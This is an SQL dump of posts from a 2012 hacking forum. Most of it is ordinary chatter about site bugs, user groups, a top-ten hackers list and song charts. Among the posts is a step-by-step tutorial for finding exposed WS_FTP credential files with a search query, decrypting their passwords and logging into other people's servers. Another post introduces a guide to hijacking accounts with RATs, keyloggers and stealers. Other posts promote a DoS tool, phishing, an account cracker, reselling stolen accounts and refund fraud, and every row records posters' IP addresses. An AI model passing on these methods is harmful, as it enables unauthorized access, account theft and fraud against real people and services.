the domain, or a plugin, or a new update... I don\'t know :p \r\n\r\n\r\nJust know that my guesses are incorrect.. xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe4f43648efa922efe9451b14d827c84', '0', '0'); INSERT INTO mybb_posts VALUES('1671', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '61', 'NXK', '1346982966', 'I\'m also getting it, Don\'t worry you aren\'t the only one.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '172c9f073e3d7ff24189988245045499', '0', '0'); INSERT INTO mybb_posts VALUES('1672', '345', '1632', '63', 'RE: Userbars [Gamers]', '0', '112', '??????Z', '1346992083', 'I like the first one. nice work! :)', '92.22.248.72', '1545009224', '0', '0', '0', '0', '1', 'f0d03389999b3e803707cdb41a76c1a5', '0', '0'); INSERT INTO mybb_posts VALUES('1673', '294', '1364', '16', 'RE: How to se pringles,monster,hersheys,duracell and stride', '0', '112', '??????Z', '1347013247', 'so far Duracell has worked and i complained saying the batteries ruined my ps3 controller so they gave me a number to ring for my reimbursement. i gave them by bank details and that was it. they are also sending me vouchers for batteries lol.', '92.22.248.72', '1545009224', '0', '0', '0', '0', '1', '4a9bd0c744367d2ba604095748f0c84d', '0', '0'); INSERT INTO mybb_posts VALUES('1674', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '82', 'iTzIpod', '1347017911', 'Oh alright. I thought I was.\nOpen until t3h jok3r posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4c2e92dacdd67be3bda3db4c9ea4e231', '0', '0'); INSERT INTO mybb_posts VALUES('1675', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '53', 'sirchamp', '1347026842', 'Yeah everyone has that error...', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5e8744f21922f10af5511e2c0fe866b0', '0', '0'); INSERT INTO mybb_posts VALUES('1676', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '62', 'R?????zo?', '1347045622', 'does this really work?\ni\'d love you if so :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c958273282564fd35292176b695fcec1', '0', '0'); INSERT INTO mybb_posts VALUES('1677', '358', '0', '3', 'Misconfigure, Unable & Cloudflare downtime', '0', '1', 't3h jok3r', '1347068867', 'If you see any errors please post them below, this will help me fix the links. Also, I\'m working on the reputation problem well not really. I can\'t fix it til I get back home, I\'m on my cousins PC and I see some errors due to the new domain, please report all errors below.\r\n\r\nThanks a bunch', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '289c2a73b7938cd4ad36a72c6d8c17e8', '0', '0'); INSERT INTO mybb_posts VALUES('1678', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '1', 't3h jok3r', '1347069083', 'Not really sure, give it a try under sandbox.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '63303d6a4f6effbb7020466d43aef6c7', '0', '0'); INSERT INTO mybb_posts VALUES('1679', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '1', 't3h jok3r', '1347069720', 'Thanks a lot for reporting, the problem has been fixed. Test can be seen in sirchamps reputation page.\n\nIf you still see the misconfiguration page then clear your cache and browser history then after a couple of hours or minutes it should be working perfectly. If you guys see any errors, please create a thread or reply to the thread below.\n\nhttp://l33thacking.net/showthread.php?tid=358\n\nThanks', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '42a07304352c2c62933ae8d7ae85f482', '0', '0'); INSERT INTO mybb_posts VALUES('1680', '358', '1677', '3', 'RE: Misconfigure, Unable & Cloudflare downtime', '0', '82', 'iTzIpod', '1347071204', 'Why was there a downtime? :/ Was down for 5 hours +', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '16587f8c761f1198ddc07755bfe40a77', '0', '0'); INSERT INTO mybb_posts VALUES('1681', '358', '1680', '3', 'RE: Misconfigure, Unable & Cloudflare downtime', '0', '1', 't3h jok3r', '1347075997', '[quote=\'iTzIpod\' pid=\'1680\' dateline=\'1347071204\']\r\nWhy was there a downtime? :/ Was down for 5 hours +\r\n[/quote]\r\n\r\nIt\'s either DDoS attacks from theprofiters or our new domain.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2068093fd66d3e10f2115e044c8b830f', '0', '0'); INSERT INTO mybb_posts VALUES('1682', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '166', '2112', '1347076505', 'Hopefully it works for you.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'c334b22aeb35f1a2289727710ea739fc', '0', '0'); INSERT INTO mybb_posts VALUES('1683', '346', '1642', '19', 'RE: Heads Up', '0', '9', 'p420', '1347076596', 'I can understand and i will try to post good tutorials.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '3ecbaba63d36d028ae8e479584d52bf9', '0', '0'); INSERT INTO mybb_posts VALUES('1684', '212', '1668', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '9', 'p420', '1347076677', '[quote=\'iTzIpod\' pid=\'1668\' dateline=\'1346974675\']\r\n[quote=\'p420\' pid=\'1659\' dateline=\'1346972016\']\r\nUnique sounds to be a group of HQ members would like to be in it.\r\n[/quote]\r\n\r\nI saw you a while on LH. But you weren\'t as active before. \r\n\r\nBut you were very HQ.\r\n\r\nHope to see you in the future. HQ as usual.\r\n[/quote]\r\n\r\nYeah, I have some ups and down with posting on LH and other sites.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '0a20fb14bc2d1854c26716f8729ed5c2', '0', '0'); INSERT INTO mybb_posts VALUES('1685', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '9', 'p420', '1347076729', 'Quick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '4fcc4e530f3889f2f043b439bc84233d', '0', '0'); INSERT INTO mybb_posts VALUES('1686', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '9', 'p420', '1347076778', 'Hi my username is p420 and I was added to this group but someone unknown, who ever did it thanks and I will remain HQ.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '43f868fe548cdc99b612e5ca839f9319', '0', '0'); INSERT INTO mybb_posts VALUES('1687', '352', '1660', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '9', 'p420', '1347076992', '[quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\']\r\nSeems legit. Please add a virus scan for your DoS tool.\r\n[/quote]\r\n\r\nDude there\'s no need for a virus scan because the download link is seized by the Feds.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'b34345139fb2db78811eb8223743b33a', '0', '0'); INSERT INTO mybb_posts VALUES('1688', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '9', 'p420', '1347077042', 'Well-written tutorial to whoever originally created this.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '97106f07f45c6af047aea2ccf060e8ed', '0', '0'); INSERT INTO mybb_posts VALUES('1689', '352', '1687', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '61', 'NXK', '1347078187', '[quote=\'p420\' pid=\'1687\' dateline=\'1347076992\']\r\n[quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\']\r\nSeems legit. Please add a virus scan for your DoS tool.\r\n[/quote]\r\n\r\nDude there\'s no need for a virus scan because the download link is seized by the Feds.\r\n[/quote]\r\n\r\nThan may I ask why there is a download link?', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'fc87d1090f1ba0aaaacd52053d340861', '0', '0'); INSERT INTO mybb_posts VALUES('1690', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '61', 'NXK', '1347078301', 'This can be used to make some money if you know where to sell accounts. Thanks for this man.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '20b8e6a38419314eefcc05088ea3631a', '0', '0'); INSERT INTO mybb_posts VALUES('1691', '359', '0', '29', 'Easiest Hacking Technique EVER!', '0', '1', 't3h jok3r', '1347079022', 'n this tutorial I will show you hands on how to hack ftp/cp accounts without downloading a single file.\r\n\r\nStep 1: [url=http://lmgtfy.com/?q=filetype:ini+inurl:WS_ftp]Click Here[/url]\r\n\r\nThis will result in websites that host a ini file that contains secure ftp/cp logins\r\n[img]http://i291.photobucket.com/albums/ll303/shnackhag/9fad24c674f04c88e489fa5d538eb746.jpg[/img]\r\ncopy the encrypted password \"pwd=\" & the login host address\r\n\r\nStep 2: [url=http://www.undermined.org/tools/security/decrypters/wsftp.php]Click here to decrypt the password[/url]\r\n\r\nThen login to host address with account name/decrypted password using fake IP/Proxy/VPN w/e.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'cf458c87e49b527b5a524072f169e7c7', '0', '0'); INSERT INTO mybb_posts VALUES('1693', '311', '1483', '15', 'RE: UploadNSell Scraper', '0', '5', 'Timmy', '1347080107', '[quote=\'HoverCatz\' pid=\'1483\' dateline=\'1346656899\']\r\nI already made one, and its not copy pasted from HF.\r\n[/quote]\r\n\r\nOh I didn\'t know that this was in the VIP section. My bad', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '1e85d4764f954873ea77865e8a09e374', '0', '0'); INSERT INTO mybb_posts VALUES('1694', '360', '0', '58', 'What are the official groups?', '0', '5', 'Timmy', '1347080163', 'I would like to know what official groups does LH have at the moment?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3cc3634e50fa6d6d9ed1dac6534ca537', '0', '0'); INSERT INTO mybb_posts VALUES('1703', '212', '1684', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1347123494', '[quote=\'p420\' pid=\'1684\' dateline=\'1347076677\']\r\n[quote=\'iTzIpod\' pid=\'1668\' dateline=\'1346974675\']\r\n[quote=\'p420\' pid=\'1659\' dateline=\'1346972016\']\r\nUnique sounds to be a group of HQ members would like to be in it.\r\n[/quote]\r\n\r\nI saw you a while on LH. But you weren\'t as active before. \r\n\r\nBut you were very HQ.\r\n\r\nHope to see you in the future. HQ as usual.\r\n[/quote]\r\n\r\nYeah, I have some ups and down with posting on LH and other sites.\r\n[/quote]\r\n\r\nI have that too. But since you are HQ, I have invited you to Unique. =]\r\n\r\nWelcome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37754798309446bbfe3635160d2e61de', '0', '0'); INSERT INTO mybb_posts VALUES('1696', '315', '1686', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347104956', '[quote=\'p420\' pid=\'1686\' dateline=\'1347076778\']\r\nHi my username is p420 and I was added to this group but someone unknown, who ever did it thanks and I will remain HQ.\r\n[/quote]\r\n\r\nIt was me. =]\r\nYou\'re welcome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '54a405b9009140b54fa1e69187414170', '0', '0'); INSERT INTO mybb_posts VALUES('1697', '317', '1685', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1347105064', '[quote=\'p420\' pid=\'1685\' dateline=\'1347076729\']\r\nQuick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod.\r\n[/quote]\r\n\r\n\r\nIt was just because I trusted him. I would\'ve promoted JakeUS but I don\'t think he will be active these days. He asked for a demote.. And though he is more HQ than me :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cde5f55e8ff3393c53518c01e102ece6', '0', '0'); INSERT INTO mybb_posts VALUES('1698', '346', '1683', '19', 'RE: Heads Up', '0', '82', 'iTzIpod', '1347105184', '[quote=\'p420\' pid=\'1683\' dateline=\'1347076596\']\r\nI can understand and i will try to post good tutorials.\r\n[/quote]\r\n\r\nAlright. Thanks for helping out! =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '736d5f6d3dcc3f6f77c7899a352895fa', '0', '0'); INSERT INTO mybb_posts VALUES('1699', '360', '1694', '58', 'RE: What are the official groups?', '0', '166', '2112', '1347114854', '[img]http://i.imgur.com/xYeqD.png[/img]', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '2251cecf7b56cd3474be74575e089f08', '0', '0'); INSERT INTO mybb_posts VALUES('1700', '332', '1563', '4', 'RE: Hello', '0', '172', 'MistaCode', '1347119948', '[quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\']\r\nWelcome to L33THacking Trojan/Mistacode.\r\n\r\nSince you have come from nerdchat, I have upgraded your account for free.\r\n[/quote]\r\nThanks Dude! I can offer you free graphics if you want?\r\nUserbar, Logo ?', '171.25.204.117', '-1424372619', '0', '0', '0', '0', '1', 'fc8277edadeeaaa1f277571cf9e8d69a', '0', '0'); INSERT INTO mybb_posts VALUES('1701', '332', '1700', '4', 'RE: Hello', '0', '82', 'iTzIpod', '1347120289', '[quote=\'MistaCode\' pid=\'1700\' dateline=\'1347119948\']\r\n[quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\']\r\nWelcome to L33THacking Trojan/Mistacode.\r\n\r\nSince you have come from nerdchat, I have upgraded your account for free.\r\n[/quote]\r\nThanks Dude! I can offer you free graphics if you want?\r\nUserbar, Logo ?\r\n[/quote]\r\n\r\nCan you add me on Skype and show me some of your examples? I bet you\'re better than me! :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a7808af22a397bffcf2b9e3a0114dfae', '0', '0'); INSERT INTO mybb_posts VALUES('1702', '361', '0', '54', 'Xbox live Code (1 Month)', '0', '172', 'MistaCode', '1347120296', 'I used Upload n Sell exploit to get these so enjoy :D\r\n\r\n[code]\r\nPQR6D-VTRBW-J4QR6-6XC7J-T8KBJ\r\n[/code]\r\n\r\nDon\'t forget to say thanks!', '171.25.204.117', '-1424372619', '0', '0', '0', '0', '1', '988bfa2e755cc55a8173b3efe5b39fec', '0', '0'); INSERT INTO mybb_posts VALUES('1704', '332', '1700', '4', 'RE: Hello', '0', '1', 't3h jok3r', '1347128728', '[quote=\'MistaCode\' pid=\'1700\' dateline=\'1347119948\']\r\n[quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\']\r\nWelcome to L33THacking Trojan/Mistacode.\r\n\r\nSince you have come from nerdchat, I have upgraded your account for free.\r\n[/quote]\r\nThanks Dude! I can offer you free graphics if you want?\r\nUserbar, Logo ?\r\n[/quote]\r\n\r\nThat\'s awesome. I\'ll let you know if I need any GFX help.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6af9d8c30052ab54d6c6f79d95c67dab', '0', '0'); INSERT INTO mybb_posts VALUES('1705', '362', '0', '7', 'List of TOP 10 HACKERS', '0', '1', 't3h jok3r', '1347132958', '[size=large][b]10. Eric Corely\r\n[/b][/size]\r\n\r\n[img]http://www.toptenz.net/wp-content/uploads/2010/05/Eric-corley.jpg[/img]\r\n\r\nBetter known as a pseudonym from George Orwell’s book 1984, Emmanuel Goldstein, Eric Corley was a well-known figure when it came to hacking, especially in the 1980 and 90s. In 1999 he went to court for sharing DeCSS codes and a method to download it, a program that was able to decrypt content on an encrypted DVD. His court case stands as the first to test the Digital Millennium Copyright Act. Corley was told to remove the program from his website. Though the main link was removed, almost 500 other websites had provided their own links to access and download the program. To continue this motion, Corley posted a banner stating that he encouraged mirroring of the link. And even today, you can still easily find the program.\r\n\r\nNow Corley lives in N.Y.C. and hosts a radio show called Off the Hook on WBAI as well as Brain Damage on Stony Brook University’s WUSB. He also runs a magazine named 2600: The Hacker Quarterly that provides information about phreaking and basic hacking. In 2001, he took part in a demonstration against the jailing of Kevin Mitnick (see #1) and in 2004 was arrested for videotaping the demonstration and was charged with disorderly conduct.\r\n\r\n[size=large][b]9. Robert T. Morris, Jr[/b][/size]\r\n\r\n[img]http://www.toptenz.net/wp-content/uploads/2010/05/robert-morris-jr.jpg[/img]\r\n\r\nBest known for a worm named after himself, the Morris worm, Robert T. Morris, Jr. is accredited with creating the first computer worm, not to be confused with the first computer virus. While a computer virus uses other files to replicate itself, a computer worm will utilize other networks in order to spread and infect others. In 1988, the Morris worm was created. To hide his tracks, Morris first set off the virus from MIT, even though he built and released it while a student at Cornell. According to Morris, the main purpose of his worm was to see how many computers were connected to the Internet. However, due to a configuration in the worm, it did a lot more damage than expected. Some of the totals ranged from $20,000 to $530,000. Despite this damage, Morris only had to do community service and was spared jail time.\r\n\r\nToday, Morris is a professor at Massachusetts Institute of Technology teaching in the computer science and electrical engineering field. In the past, despite his record with computer hacking and other illegal activity, he was able to become the chief scientist at the National Computer Security Center. The NCSC is a branch of the National Security Agency.\r\n\r\n[size=large][b]8. Nahshon Even-Chaim[/b][/size]\r\n\r\nNahshon Even-Chaim stands as the first person in Australia to be arrested and convicted of computer hacking. Even-Chaim, better known as Phoenix online, was part of a very popular hacking group based out of Australia known as The Realm. Though the internet wasn’t as widely known during the beginning of his hacking reign, Even-Chaim was able to utilize X.25 networks as well as “dialing-in” methods to hack and focused on penetrating networks of defense and nuclear agencies. Eventually the Australian Federal Police caught on and were able to get a warrant to wire-tap his phone and watch all signals coming in and out of his modem.\r\n\r\nIn April 1990, Even-Chaim’s home, along with two others, was raided. He was arrested and charged with 48 crimes. However, once his time in court came, he was able to strike a bargain and only had to do a 12 month jail term and 500 hours of community service, opposed to 10 years in jail. Today, Even-Chaim works in the IT field and has delved into music.\r\n\r\n[size=large][b]7. Mark Abene[/b][/size]\r\n\r\n[img]http://www.toptenz.net/wp-content/uploads/2010/05/Mark-Abene.jpg[/img]\r\n\r\nOnline, you’d have known Mark Abene as “Phiber Optik.” Born in New York City, Abene was a well-known member of groups such as Masters of Deception and Legion of Doom. Both of these groups were known for their hacking skills and often times those who took part in the groups would be able to share hacking knowledge with others. Most of the members were eventually caught and investigated by the F.B.I. Abene was no exception. At the young age of 9, Abene was able to access dial-up computers and from there his curiosity grew and he learned numerous computer languages of the time. He was soon introduced to the Legion of Doom as well as the Masters of Deception and during this time he became interested in operating systems as well as telecommunications which enabled him to learn about the hacking technique of phreaking.\r\n\r\nHowever, soon after joining the group, on January 24, 1990, those who took part in these groups had their homes searched. In 1991, he was formally arrested with computer trespassing and tampering. He took a plea bargain and only had to serve 35 months of community service. In 1997, Abene and other ex-members of the Legion of Doom created Crossbar Security, but the company soon went out of business in 2001. Today Abene works as an independent consultant.\r\n\r\n[size=large][b]6. Fred Cohen[/b][/size]\r\n\r\n[img]http://www.toptenz.net/wp-content/uploads/2010/05/fred-cohen.jpg[/img]\r\n\r\nThough not as malicious as most on this list, Fred Cohen is definitely well known in the computer world. Studying to be a computer scientist at University of Southern California’s School of Engineering in 1983, Cohen was able to create the first computer virus. The virus he created was able to completely overtake a computer and control each one of its functions. His virus allowed other computer scientists to see that not all viruses can be solved by just one commonly used algorithm.\r\n\r\nHowever, Cohen was also able to create good viruses. As silly as it sounds, he was able to create a virus that did nothing malicious to a computer. After putting the virus on a computer, it went into each executable file (.exe) and made them smaller. He named it the compression virus. Cohen was never jailed because his efforts were done for educational purposes. Today he runs a company that provides information security.\r\n\r\n[size=large][b]5. Vladimir Levin[/b][/size]\r\n\r\nLevin was well known in the 1990s for his hacking efforts which exposed the vulnerability of popular company websites, one of the most notable in this case being Citibank. Levin, in 1994, was able to access Citibank accounts belonging to various corporate customers. He used the dial-up wire transfer service and was able to successfully transfer the money out of these accounts into accounts located in Israel, Germany, the U.S., Finland, and the Netherlands. Levin had an accomplice at each of these locations. However, 3 of his accomplices were watched as they attempted to withdraw money. They were arrested and all of them gave signs pointing to Levin. In 1995, Levin was arrested.\r\n\r\nBy the end of it all, Levin was able to successfully, but fraudulently transfer about $10.7 dollars from Citibank accounts into ones he had set up. In 1997 he was brought to the U.S. and pleaded guilty to conspiracy to defraud as well as stealing $3.7 million. He was put in jail for 3 years and ordered to pay $240,015. Out of all the money that Levin was able to transfers out of Citibank into other banking facilities, only $400,000 was located and recovered. Since the incident Citibank has upped its security, as have many other banking companies that utilize online actions. Today he owns and runs a business in Lithuania.\r\n\r\n[size=large][b]4. John Schiefer[/b][/size]\r\n\r\nSchiefer is well known for defrauding companies, as well as installing malware to intercept vital information. The malware that Schiefer used was known as “spybots.” These pieces of malware acted as wiretaps and were able to access communications between the infected computer and bank accounts. He then was able to find out usernames, passwords, and other information. From there Schiefer would use the bank accounts to make fraudulent purchases, and would share the information with others. He utilized the same method to infected and gain information from computers with Microsoft operating systems.\r\n\r\nOnce arrested, Schiefer was charged with wire and bank fraud, intercepting private information to commit identity theft, and installing malware on dozens of computers in order to retrieve the private information that he needed. He stands as the first person to be charged with using botnets for hacking purposes. In 2009 he was charged and sentenced to four years in prison.\r\n\r\n[size=large][b]3. Adrian Lamo[/b][/size]\r\n\r\n[img]http://www.toptenz.net/wp-content/uploads/2010/05/adrian-lamo-arrest-warrant-266x400.jpg[/img]\r\n\r\nKnown as a grey hat hacker, meaning one who hacks sometimes for good reasons, Adrian Lamo is another hacker that found himself in trouble after the F.B.I was able to probe his illegal actions. Lamo is unique as he never stayed at one location to perform his hacking. He usually lived house to house, couch to couch, and often did a lot of his exploiting and investigating from internet cafes and university libraries. He is well known for exploiting companies such as Microsoft, the New York Times, Lexis-Nexis, and Yahoo!. Because of his actions, many companies, namely, the New York Times, filed complaints and for 15 months Lamo was investigated by the F.B.I. He eventually realized he was being tracked and went into hiding, but surrendered to the U.S. Marshals on September 9, 2003. He plead guilty in court and was ordered to pay $65,000 and was sentenced to home detention and probation afterward.\r\n\r\nHowever, Lamo, as a grey hat hacker, did have a good side. He took it upon himself to hack into several different Fortune 500 companies’ websites in order to find security flaws. After finding what he could, he then reported back to the company of what security issues needed to be fixed. While many would get paid for this type of work Lamo never accepted any type of monetary award. Today Lamo is in college working his way towards becoming a top-rated journalist. A documentary, Hackers Wanted, was made depicting Lamo’s life and hacking skills.\r\n\r\n[size=large][b]2. Kevin Poulsen[/b][/size]\r\n\r\n[video=youtube]https://www.youtube.com/watch?v=0NxJrCXG6gc[/video]\r\n\r\nPoulsen, a black hat hacker, meaning one who hacks for a malicious purpose, is well known for his skills. Also known as Dark Dante, Poulsen is probably best known for his takeover of the KIIS-FM phone lines, a Los Angeles based radio station. At the time, the radio was running a contest. The 102nd caller would possibly win a Porsche 944 S2. With this in mind, Poulsen was able to clog all of the lines, which inevitably would make him the 102nd caller. Once the F.B.I realized Poulsen’s actions, they began to investigate him, but during this time he found ways to keep himself hidden. However, one day on Unsolved Mysteries, Poulsen was one of the many fugitives aired on the show, and during that time, the phone lines crashed. Of course this was Poulsen’s doing. In June 1994 he was finally caught and arrested and charged with wire, mail, and computer fraud, as well as money laundering. He spent about 4 months in jail and had to pay $56,000. Today he works as a senior editor for Wired News.\r\n\r\n[size=large][b]1. Kevin Mitnick[/b][/size]\r\n\r\n[video=youtube]https://www.youtube.com/watch?v=8_VYWefmy34[/video]\r\n\r\nAt the age of 12, Mitnick learned the high importance of social engineering. Though this type of hacking doesn’t involve computers, it helps you to gain access to things such as emails, social networking sites, and others, by simply asking the right questions. He used this method to bypass the card system used in the L.A. transit system. In 1979, at the age of 16, Mitnick was able to get access to his first computer network. After years of accessing numbers of networks and private emails, as well as cloning cell phones and using false I.D., Mitnick was arrested in 1995.\r\n\r\nAfter being arrested, he was charged with evading the F.B.I., wiretapping, computer fraud, hacking into Digital Equipment Corporation systems, taking over a computer at the Computer Learning Center in Los Angeles, and hacking many other systems including Nokia, Motorola, Fujitsu Siemens, and many others. When he was arrested, Mitnick was the most wanted computer hacker in the U.S. His activities cost companies a lot of money. Digital Equipment Corporation alone had to pay $160,000 to clean up the damage Mitnick had done. In 2002 he published a book entitled The Art of Deception: Controlling the Human Element of Security in which he talks all about his experiences and how he did it. Today he owns a company that offers security consulting.\r\n\r\n[color=transparent]Hacking\r\ntop 10\r\nl33thacking\r\n[/color]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '4cb0f4a816af974feb8a8dec1bb79594', '0', '0'); INSERT INTO mybb_posts VALUES('1706', '363', '0', '8', 'Top 10 songs of September 2012', '0', '1', 't3h jok3r', '1347133364', '1. Whistle by Flo Rida\r\n2. We Are Never Ever Getting Back Together by Taylor Swift\r\n3. One More Night by Maroon 5\r\n4. Lights by Ellie Glouding\r\n5. Some Nights by FUN.\r\n6. Everybody talks by Neon Talks\r\n7. Wide Awake by Katy Perry\r\n8. Good Time by Owl City & Carly Rae Jepsen\r\n9. As long as you love me by Justin Bieber Featuring Big Sean\r\n10. Call me maybe by Carly Rae Jepsen\r\n\r\n[color=transparent]\r\nrap\r\nr&b\r\nhouse\r\nclassic\r\njusin bieber\r\n[/color]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'd44454c3c31d0ff88cccde1e7caccc20', '0', '0'); INSERT INTO mybb_posts VALUES('1707', '358', '1677', '3', 'RE: Misconfigure, Unable & Cloudflare downtime', '0', '20', 'JakeUS', '1347137522', 'Thanks for the information.\n\nIf you see ANY bugs, report them ASAP!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '59b3b9476121a07270e9c4afa305e7fc', '0', '0'); INSERT INTO mybb_posts VALUES('1708', '364', '0', '12', 'How to hack accounts Hotmail/yahoo/Runescape/Minecraft/Porn [Guide By NXK]', '0', '61', 'NXK', '1347137768', '[color=#FFFFFF][u][b]Introduction[/b][/u][/color]\r\nSo you\'re probably looking at this thread intrested in hacking some accounts. For what ever your reasons may be. Maybe it\'s an enemy.. Maybe you want to make some money. What ever your reasons are. You\'ve came to the right place.\r\n\r\nIn this Thread we will be covering me most effective ways to get what you want. Methods to do so.\r\n\r\n[color=#FFFFFF][u][i][b]What will I be covering?[/b][/i][/u][/color]\r\n\r\n-Rats (Remote Administration Tool)\r\n-Keyloggers (A program that records A victims Keystrokes)\r\n-Java Drive By (A website way of exploiting java and installing a Virus via website)\r\n-Stealers (steals all saved passwords stored on the Vitims PC)\r\n-BruteForcing (A program that uses proxys and username/Password lists to attempt mass logins to A target website In hope of finding someones account password/username', '99.253.65.17', '1677541649', '0', '0', '0', '0', '-2', '97e7bcff401372dc77377eb9b819fdba', '0', '0'); INSERT INTO mybb_posts VALUES('1709', '365', '0', '3', 'HAHA SHIT CAN WORK!!!!', '0', '1', 't3h jok3r', '1347170217', 'After 40+ 404 page not found errors I finally got the new shit ass plugin to work :D\r\n\r\nThanks to god and my luck \r\n\r\nSorry for the inconvenience. Please report any broken urls or pages.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'e97f39cf1d28511c516d31eb0b90f0b6', '0', '0'); INSERT INTO mybb_posts VALUES('1710', '366', '0', '2', 'Testing SMTP Emailer', '0', '1', 't3h jok3r', '1347172849', 'HAHAHAHAHAHA', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '905baa10b1eda035aaafdd34f4476c19', '0', '0'); INSERT INTO mybb_posts VALUES('1711', '366', '1710', '2', 'RE: Testing SMTP Emailer', '0', '4', 'Triple H', '1347172892', 'Hope it works..... Lalalaa', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '26370fdbe65defe9b2db460a06c28db7', '0', '0'); INSERT INTO mybb_posts VALUES('1712', '366', '1710', '2', 'RE: Testing SMTP Emailer', '0', '5', 'Timmy', '1347172953', 'Yippeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeezzzzzzzzzzzzzzzzz', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'b675fa7aea658715b0d541176a287bda', '0', '0'); INSERT INTO mybb_posts VALUES('1713', '367', '0', '3', 'Please Read!', '0', '1', 't3h jok3r', '1347173438', 'Today the site had a lot of 404 page errors, I finally solved the problem after working on it for 5+ hours. Also I finally got our emailer working. \r\n\r\nFrom now on all email activations & email notifications will be sent to whoever has subscribed or joined. Almost forgot, I have now customized our 404 error page. Feel free to check it out by entering a invalid LH url. \r\n\r\nHope you guys like my updates and dedication to LH.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'e46be1c1aabbd0112c922b27291476e2', '0', '0'); INSERT INTO mybb_posts VALUES('1714', '368', '0', '47', '5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347174018', 'I will be creating and giving out 5 @l33thacking.net forwarders to the first 5 people to create 3 HQ threads anywhere on LH. First check in below then post 3 HQ threads and PM me saying you are done or with the links.\n\n[b]What is a forwarder?[/b]\n\nFor example: john@l33thacking.net is the forwarder, when someone sends an email to john@l33thacking.net then john@hotmail.com will receive it.\n\nYou don\'t have to be using hotmail. John@hotmail was an example.\n\nWe are not responsible for how you may use this. Any illegal activities on this forwarder, we will deactivate/remove your forwarder.', '72.229.164.105', '1223009385', '1', '0', '1', '1347326947', '1', 'bf1948b47bee85e214025307211fd408', '0', '1347326947'); INSERT INTO mybb_posts VALUES('1715', '331', '1545', '5', 'RE: New Rules and Instructions v.3', '0', '1', 't3h jok3r', '1347176423', 'Added under age rule.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '73b46e24a6554b1210c7be894ae448e5', '0', '0'); INSERT INTO mybb_posts VALUES('1716', '249', '1630', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1347177411', '[quote=\'iTzIpod\' pid=\'1630\' dateline=\'1346961786\']\r\nLol @Reloadzor but still, I won.\r\n[/quote]\r\n\r\nNot really, by the way, this thread is really LQ.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '0c3d3e4a5a4ab0ff863f04986a57c672', '0', '0'); INSERT INTO mybb_posts VALUES('1717', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '1', 't3h jok3r', '1347178001', 'Sent to fap long time ago ;)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a6dba44655965091f83065f1e5629f49', '0', '0'); INSERT INTO mybb_posts VALUES('1718', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '1', 't3h jok3r', '1347178287', 'That\'s some huge mother fucking list.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 